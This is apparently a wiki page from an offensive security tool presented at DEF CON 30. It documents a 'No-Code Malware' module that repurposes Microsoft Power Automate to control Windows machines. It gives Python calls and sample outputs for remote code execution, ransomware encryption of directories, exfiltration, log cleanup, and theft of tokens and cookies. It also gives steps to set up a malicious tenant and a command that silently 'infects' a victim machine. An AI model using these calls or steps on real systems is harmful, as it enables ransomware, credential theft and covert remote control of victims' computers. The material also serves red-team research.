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Modules: No‐Code Malware

Michael Bargury edited this page Jul 27, 2023 · 12 revisions


Repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation.

This capability was first presented at a DEFCON30 talk titled No-Code Malware - Windows 11 at Your Service:

DEF CON 30 - Michael Bargury - No-Code Malware - Windows 11 at Your Service


from powerpwn.machinepwn.machine_pwn import MachinePwn

pp = MachinePwn(post_url=POST_URL)

### code execution

# python2
pp.exec_py2("print('hello world')").cmd_code_execution
# CodeExecOutputs(ScriptOutput='\ufeffhello world\r\n', ScriptError='')

# python2 bad syntax
pp.exec_py2("bad syntax").cmd_code_execution
# CodeExecOutputs(ScriptOutput='', ScriptError='  File "", line 1\r\n    bad syntax\r\n        ^\r\nSyntaxError: unexpected token \'syntax\'')

# powershell
pp.exec_ps("Write-Host \"hello word\"").cmd_code_execution

# commandline
pp.exec_cmd("echo \"hello word\"").cmd_code_execution
# CodeExecOutputs(ScriptOutput='Microsoft Windows [Version 10.0.22000.795]\r\n(c) Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files (x86)\\Power Automate Desktop>echo "hello word"\r\n"hello word"\r\n\r\n', ScriptError='')

### ransomware

pp.ransomware(crawl_depth=2, dirs_to_init_crawl=["C:\\Users\\alexg\\Documents\\mystuff", "D:\\shh"], encryption_key="8d1d4245").cmd_ransomware
# Ransomware=RansomwareOutputs(FilesFound=9, FilesAccessed=9, FilesProcessed=9, Errors='')

### exfiltration

# ExfiltrationOutputs(Success=True, FileContents='asd')
# ExfiltrationOutputs(Success=False, FileContents='')

### cleanup

# CleanupOutputs(FilesFound=179, LogFilesDeleted=178)

### steal_power_automate_token

# StealPowerAutomateTokenOutputs(Token='ey...')

### steal_cookie
# StealCookieOutputs(Cookie='1P_JAR=2022-07-16-13; OGPC=19027681-1:')

How To

How to set up your cloud environment

Set up a malicious Power-Pwn Microsoft tenant

  1. Set up your free Microsoft tenant by following Microsoft guidelines

    Pwntoso tenant

  2. Create a malicious user account and assign it a Power platform administrator role. The admin role isn't necessary, it's just convenient.

    Power platform administrator role

  3. On a private browser tab

    1. Go to and log in with the malicious user. Follow through the sign-in process to initiate a Power Automate trial license.

    2. Follow the same process with to initiate a Power Apps trial license.

  4. Create a Service Principal by following Microsoft guidelines and note the tenantId, applicationId and secret.

Infect a test victim machines

  1. Infect a test machine by following the How to infect a victim machine guide.

  2. Verify that the machine has been onboarded

    1. Log into as the malicious user

    2. Click Go to Monitor and then Machines and verify that the test victim machine is there

    Victim machines

Upload pwntoso to your Power Automate cloud environment

  1. Log into with the malicious user.

  2. Go to Solutions and click Import solution

    Import pwntoso solution

  3. Zip the content of pwntoso_1_0_0_1 and select it when asked to provide a solution file. Follow the guided process to completion.

    1. When asked to provide a connection, following the guided process to create a new machine connection. Use the test victim machine credentials.
  4. Go to My flows and search for Endpoint

    Endpoint flow

    Click on Edit and then on When a HTTP request is received and copy the URL under HTTP POST URL

    HTTP Post URL

  5. Note the HTTP Post URL for use with the Python module.

How to infect a victim machine

To register a victim machine, recall the , and you got from following the cloud setup guide and run the following command

echo <secret> | C:\Program Files (x86)\Power Automate Desktop\PAD.MachineRegistration.Silent.exe -register -applicationid <applicationId> -tenantid <tenantId> -clientsecret -force

That's it! For troubleshooting, refer to Microsoft Docs.

How to troubleshoot execution errors


Got success=False with code=SessionExistsForTheUserWhenUnattended in unattendedError?

Got to Machines -> locate the machine -> three vertical dots -> Edit details -> Reuse sessions for unattended runs. See reuse sessions for unattended runs